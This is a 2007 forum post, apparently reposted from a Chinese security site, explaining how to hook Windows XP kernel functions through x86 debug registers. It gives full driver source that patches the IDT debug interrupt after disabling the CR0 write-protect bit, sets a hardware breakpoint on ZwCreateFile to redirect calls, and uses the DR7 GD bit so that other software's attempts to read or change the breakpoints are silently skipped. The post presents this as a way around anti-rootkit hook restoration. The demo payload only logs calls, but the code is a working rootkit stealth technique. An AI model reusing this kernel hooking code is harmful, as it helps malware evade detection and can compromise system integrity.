文章作者:
yykingking@126.com
@ :: worthy :: Jun 24 2007, 22:36 (UTC+0)
yykingking writes: Rk always use HOOK important functions to hide something , and some ARK first recover these hookers ( common by harddisk files) and then call the function.
And this is another way to HOOK in the kernel by DRX register. About the DRX register ,you can google it, there should be much info. So i only post some simple code next because of my poor english, if you know chinese, you can get the comment.
These code should be run in xp, and it simply act HOOK the ZwCreateFile and print the debug information.
复制内容到剪贴板
代码:
/*
drxhook.h
Written By [email]yykingking@126.com[/email]
*/
#ifndef _DRX_HOOK
#define _DRX_HOOK
#include <ntddk.h>
typedef unsigned long DWORD;
typedef unsigned char BOOL;
#pragma pack(push,1)
typedef struct _idtr
{
//定义中断描述符表的限制,长度两字节;
short IDTLimit;
//定义中断描述服表的基址,长度四字节;
unsigned int IDTBase;
}IDTR,*PIDTR;
typedef struct _IDTENTRY
{
unsigned short LowOffset;
unsigned short selector;
unsigned char unused_lo;
unsigned char segment_type:4; //0x0E is an interrupt gate
unsigned char system_segment_flag:1;
unsigned char DPL:2; // descriptor privilege level
unsigned char P:1; /* present */
unsigned short HiOffset;
} IDTENTRY,*PIDTENTRY;
#pragma pack(pop)
DWORD GetDBEntry();
void HookDBInt();
void UnHookDBInt();
#endif
/*
drxhook.cpp
Written By [email]yykingking@126.com[/email]
*/
#include "drxhook.h"
DWORD g_OldDBEntry;
IDTR g_IDTR;
DWORD g_OldCreateFile;
DWORD g_HookNumber = 0;
DWORD g_CR0;
BOOL g_bExit;
void ReLoadCR0AndSti()
{
__asm
{
push eax
mov eax, g_CR0
mov cr0, eax
pop eax
sti
}
}
void CliAndDisableWPBit()
{
__asm
{
cli
push eax
mov eax, cr0
mov g_CR0, eax
and eax, 0xFFFEFFFF
mov cr0, eax
pop eax
}
}
void PrintHook()
{
DbgPrint(" Now Get In ZwCreateFile Hook: %d...Pid: %d...\n", g_HookNumber++, (DWORD)PsGetCurrentProcessId());
}
__declspec(naked) void NewZwCreateFile()
{
__asm
{
pushfd; // 仅仅适合于 XP 操作系统
call PrintHook;
popfd;
mov eax,0x25;
jmp g_OldCreateFile;
}
}
void SetHB() // set hardware breakpoint 设置硬件断点
{
__asm
{
mov eax, ZwCreateFile; // 想要挂接的函数或者地址
mov dr0, eax;
mov eax, dr7;
or eax, 0x2703; // 也要修改 dr7:GD 位,以免DrX被操作系统或其他程序修改
and eax, 0xfff0ffff;
mov dr7, eax;
}
}
__declspec(naked) void NewDBEntry()
{
__asm
{
pushfd;
push eax;
mov eax, dr6;
test eax, 0x2000;
jz NOT_EDIT_DRX;
// 以下是如果有对DRX的操作的简单处理,如有需要可以修改
// 我只是简单的跳过这些指令
and eax, 0xFFFFDFFF;
mov dr6, eax; // 清除DR6的标志
cmp g_bExit, 0;
jnz MY_DRV_EXIT; // 驱动 Unload
mov eax, [esp+8]; // 获取堆栈中的 EIP
add eax, 3; // 由于所有对 DRX 的操作全都是3个字节的
mov [esp+8], eax; // 修改 EIP ,跳过当前指令,返回时执行下条指令
jmp MY_INT_END;
NOT_EDIT_DRX:
mov eax, dr6;
test eax, 0x1;
jz SYS_INT; // 如果不是Dr0 产生的中断,则跳回原系统中断
mov eax, [esp+8];
cmp eax, ZwCreateFile; // 判断一下是不是 ZwCreateFile 的线性地址
jnz SYS_INT;
mov eax, NewZwCreateFile;
mov [esp+8],eax; // 修改堆栈中的 EIP ,实现返回时跳转
MY_INT_END:
mov eax, dr7;
or eax, 0x2000; // 恢复 GD 位
mov dr7, eax;
MY_DRV_EXIT: // 整个驱动 UnLoad 时,不恢复 Dr7
pop eax;
popfd;
iretd;
SYS_INT:
pop eax;
popfd;
jmp g_OldDBEntry;
}
}
DWORD GetDBEntry()
{
PIDTENTRY IdtEntry;
DWORD Entry;
__asm sidt g_IDTR;
IdtEntry = (PIDTENTRY)(g_IDTR.IDTBase + 8);
Entry = IdtEntry->HiOffset << 16;
Entry |= IdtEntry->LowOffset;
return Entry;
}
void HookDBInt()
{
DWORD NewEntry;
PIDTENTRY IdtEntry;
NewEntry = (DWORD)NewDBEntry;
g_OldCreateFile = (DWORD)ZwCreateFile + 5; // 新的要跳转过去的地址
g_OldDBEntry = GetDBEntry();
IdtEntry = (PIDTENTRY)(g_IDTR.IDTBase + 8);
CliAndDisableWPBit();
IdtEntry->LowOffset = (USHORT)NewEntry;
IdtEntry->HiOffset = (USHORT)( NewEntry >> 16 );
ReLoadCR0AndSti();
SetHB();
g_bExit = FALSE;
return;
}
void UnHookDBInt()
{
PIDTENTRY IdtEntry;
DWORD Entry;
__asm sidt g_IDTR;
IdtEntry = (PIDTENTRY)(g_IDTR.IDTBase + 8);
CliAndDisableWPBit();
g_bExit = TRUE;
__asm mov eax, dr7; // 产生一次例外并且清除Dr7:GD
if ( g_OldDBEntry != 0 )
{
IdtEntry->LowOffset = (USHORT)g_OldDBEntry;
IdtEntry->HiOffset = (USHORT)( g_OldDBEntry >> 16 );
}
ReLoadCR0AndSti();
DbgPrint(" UnLoad drx hook..\n");
return;
}
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
UnHookDBInt();
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
HookDBInt();
DriverObject->DriverUnload = DriverUnload;
DbgPrint("Load drxhook Driver Ok...\n");
return STATUS_SUCCESS;
}
/***********************/ 
